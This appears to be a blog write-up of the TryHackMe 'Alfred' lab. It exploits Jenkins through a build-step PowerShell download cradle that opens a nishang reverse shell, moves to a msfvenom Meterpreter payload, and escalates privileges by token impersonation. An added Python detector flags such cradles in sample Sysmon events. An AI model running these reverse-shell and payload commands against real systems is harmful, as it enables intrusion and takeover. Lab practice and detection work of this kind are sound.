TryHackMe: Alfred Write-up

Onur Alp Akin
4 min read · Apr 13, 2023

Check out Alfred room on TryHackMe

Original Publish Date: Sep 29, 2022

1 — Initial Access

Start the enumeration with nmap using this command:

nmap -A -Pn -vv -T5 -p- 10.10.81.101 | tee -a nmap_results.txt

Flags that I'm using:

-A: aggressive scan (version detection, OS detection, scripts, traceroute)

-Pn: skip host discovery, because the machine does not respond to ping

-vv: increase verbosity

-T5: fastest timing template

-p-: scan all 65535 TCP ports

The tee command appends the nmap results to a file in case I need them again.

Nmap results

1.1 — How many ports are open? (TCP only)

From the nmap output we can see that the answer is 3.

1.2 — What is the username and password for the login panel?

Well, you can kinda guess :) They’re one of the most common ones.

1.3 — What is the user.txt flag?

First, start a Python HTTP server on the attacking machine to serve files:

python3 -m http.server

Then start a netcat listener for the incoming connection:

nc -lnvp 4444

Finally, download the reverse shell script from GitHub (into the directory the Python server is serving):

wget https://raw.githubusercontent.com/samratashok/nishang/master/Shells/Invoke-PowerShellTcp.ps1

Optionally, verify in your browser that the script can actually be reached through the Python server.

Navigate to Dashboard > Project > Configure

Go to Build > Command and enter the following, as recommended in the room, replacing <IP_ADDRESS> with your attacker IP (assuming you didn't change the Python server port):

powershell iex (New-Object Net.WebClient).DownloadString('http://<IP_ADDRESS>:8000/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress <IP_ADDRESS> -Port 4444

Save and go to the dashboard again. Hit build.

Build button location
We got our connection

Now we can get user.txt
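From the defender's side, the Jenkins build step above shows up in process-creation telemetry as the Jenkins java.exe spawning powershell.exe with a download cradle, and the Downloadfile step in part 2 leaves the same kind of trace. The script below is an added example (not part of the original write-up) that flags that pattern over constructed Sysmon-style events; the paths, the 10.0.0.5 address and the field names are assumptions.

```python
"""Flag Jenkins-spawned shells and PowerShell download cradles.

Constructed Sysmon Event ID 1-style records (ParentImage / Image /
CommandLine); hostnames, paths and the 10.0.0.5 address are made up.
"""
import re

# Constructed sample events: a benign build, the room's cradle, the payload
# download from part 2, and an unrelated interactive PowerShell session.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c "msbuild project.sln"'},
    {"ParentImage": r"C:\Program Files (x86)\Jenkins\jre\bin\java.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell iex (New-Object Net.WebClient).DownloadString("
                    "'http://10.0.0.5:8000/Invoke-PowerShellTcp.ps1');"
                    "Invoke-PowerShellTcp -Reverse -IPAddress 10.0.0.5 -Port 4444"},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r'''powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.0.0.5:8000/payload.exe','payload.exe')"'''},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell Get-ChildItem C:\Users"},
]

# Case-insensitive markers of a PowerShell download cradle.
CRADLE = re.compile(r"(downloadstring|downloadfile|invoke-expression|\biex\b)", re.I)
# Jenkins runs build steps from its bundled JRE; a shell child of it deserves a look.
JENKINS_PARENT = re.compile(r"\\jenkins\\.*\\java\.exe$", re.I)
SHELLS = re.compile(r"\\(powershell|pwsh|cmd)\.exe$", re.I)


def score_event(ev):
    """Return the list of reasons this process-creation event looks suspicious."""
    reasons = []
    if JENKINS_PARENT.search(ev["ParentImage"]) and SHELLS.search(ev["Image"]):
        reasons.append("shell spawned by Jenkins build agent")
    if CRADLE.search(ev["CommandLine"]):
        reasons.append("download cradle in command line")
    return reasons


def find_suspicious(events):
    """Return (index, reasons) for every event that has at least one reason."""
    return [(i, score_event(ev)) for i, ev in enumerate(events) if score_event(ev)]


if __name__ == "__main__":
    for i, reasons in find_suspicious(SAMPLE_EVENTS):
        print(i, SAMPLE_EVENTS[i]["CommandLine"][:60], "->", "; ".join(reasons))
```

Event 1 matches both rules, which is the combination worth alerting on; a build that merely spawns cmd.exe (event 0) matches only the parent rule and is best treated as context rather than an alert on its own.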

2 — Switching Shells

Use msfvenom to create a Windows Meterpreter reverse shell with the following command:

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=[IP] LPORT=5555 -f exe -o payload.exe
Msfvenom output

After creating this payload, download it to the machine using the same method as in the previous step:

powershell "(New-Object System.Net.WebClient).Downloadfile('http://<IP_ADDRESS>:8000/payload.exe','payload.exe')"

Fire up msfconsole and set up the handler:

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST your-ip
set LPORT listening-port
run
Msfconsole settings

Then run the payload on the machine:

powershell start-process "payload.exe"
We got our meterpreter shell :)

2.1 — What is the final size of the exe payload that you generated?

You can read it from the msfvenom output (the screenshot just below the start of part 2).

3 — Privilege Escalation

Let's use the incognito module, which lets us exploit this weakness by impersonating tokens. In the Meterpreter shell, type:

load incognito

Then we can impersonate the Administrators token like this:

impersonate_token "BUILTIN\Administrators"
Successful escalation

3.1 — What is the output when you run the getuid command?

The output is shown in the screenshot above.

3.2 — Read the root.txt file at C:\Windows\System32\config

First type ps and find services.exe.

Copy its PID, then type:

migrate <PID>
Migration completed

Now we can read root.txt.

Done!

And that was pretty much it.

Thank you for reading!
